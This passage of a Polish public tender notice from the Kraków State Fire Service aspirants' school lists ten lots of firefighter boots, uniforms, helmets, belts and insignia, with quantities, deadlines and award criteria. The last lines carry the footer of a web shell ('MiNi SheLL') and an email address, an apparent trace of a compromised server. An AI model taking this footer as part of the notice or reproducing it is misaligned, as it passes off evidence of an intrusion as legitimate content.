<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Aspirantów Państwowej Straży Pożarnej, 31-951 Kraków, os. Zgody 18 - Wydział Kwatermistrzowski - Dział Administracyjno - Gospodarczy pokój 300B, III piętro, bud. C.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2015 godzina 12:00, miejsce: Szkoła Aspirantów Państwowej Straży Pożarnej, 31-951 Kraków, os. Zgody 18 - sekretariat Komendanta Szkoły pokój 200, II piętro, bud. A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa butów strażackich skórzanych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa butów strażackich skórzanych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie. Przedmiot zamówienia: 
- Buty strażackie skórzane 100 par /zamówienie podstawowe/
- Buty strażackie skórzane 30 par /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa butów strażackich gumowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa butów strażackich gumowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Buty strażackie gumowe 30 par /zamówienie podstawowe/
- Buty strażackie gumowe 5 pary /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa obuwia koszarowego oraz butów dla kadry dowódczo sztabowej dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa obuwia koszarowego oraz butów dla kadry dowódczo sztabowej dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Obuwie koszarowe 100 par /zamówienie podstawowe/
- Buty dla kadry dowódczo sztabowej 10 par /zamówienie podstawowe/
- Obuwie koszarowe 20 par /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.50.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ubrań specjalnych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ubrań specjalnych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Ubranie specjalne 95 kpl. /zamówienie podstawowe/
- Ubranie specjalne 20 kpl. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołączy do siwz jako załącznik 1.4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa ubrań koszarowych oraz ubrań roboczych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ubrań koszarowych oraz ubrań roboczych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Ubranie koszarowe (bluza + spodnie) 130 kpl. /zamówienie podstawowe/
- Ubranie koszarowe (czapka) 150 szt. /zamówienie podstawowe/
- Ubranie robocze (bluza + spodnie) 6 kpl. /zamówienie podstawowe/
- Ubranie koszarowe (bluza + spodnie) 50 kpl. /zamówienie w ramach prawa opcji/
- Ubranie koszarowe (czapka) 50 szt. /zamówienie w ramach prawa opcji/
- Ubranie robocze (bluza + spodnie) 2 kpl. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3, 35.11.34.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa koszulek letnich oraz koszulek zimowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa koszulek letnich oraz koszulek zimowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Koszulka letnia 260 szt. /zamówienie podstawowe/
- Koszulka zimowa 260 szt. /zamówienie podstawowe/
- Koszulka letnia 40 szt. /zamówienie w ramach prawa opcji/
- Koszulka zimowa 40 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa hełmów strażackich dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa hełmów strażackich dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Hełm strażacki 50 szt. /zamówienie podstawowe/
- Hełm strażacki 10 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.41.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa kominiarek niepalnych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kominiarek niepalnych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Kominiarka niepalna 45 szt. /zamówienie podstawowe/
- Kominiarka niepalna 10 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa pasów bojowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pasów bojowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Pas bojowy 30 szt. /zamówienie podstawowe/
- Pas bojowy 10 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa dystynkcji i emblematów dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa dystynkcji i emblematów dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Dystynkcje na plakietkach 502 szt. /zamówienie podstawowe/
- Dystynkcje na beret 320 szt. /zamówienie podstawowe/
- Dystynkcje na pochewkach 170 kpl. /zamówienie podstawowe/
- Identyfikator kadry dowódczo - sztabowej 8 szt. /zamówienie podstawowe/
- Emblemat SA PSP w Krakowie 100 szt. /zamówienie podstawowe/
- Dystynkcje na plakietkach 50 szt. /zamówienie w ramach prawa opcji/
- Dystynkcje na beret 10 szt. /zamówienie w ramach prawa opcji/
- Dystynkcje na pochewkach 10 kpl. /zamówienie w ramach prawa opcji/
- Identyfikator kadry dowódczo - sztabowej 2 szt. /zamówienie w ramach prawa opcji/
- Emblemat SA PSP w Krakowie 10 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com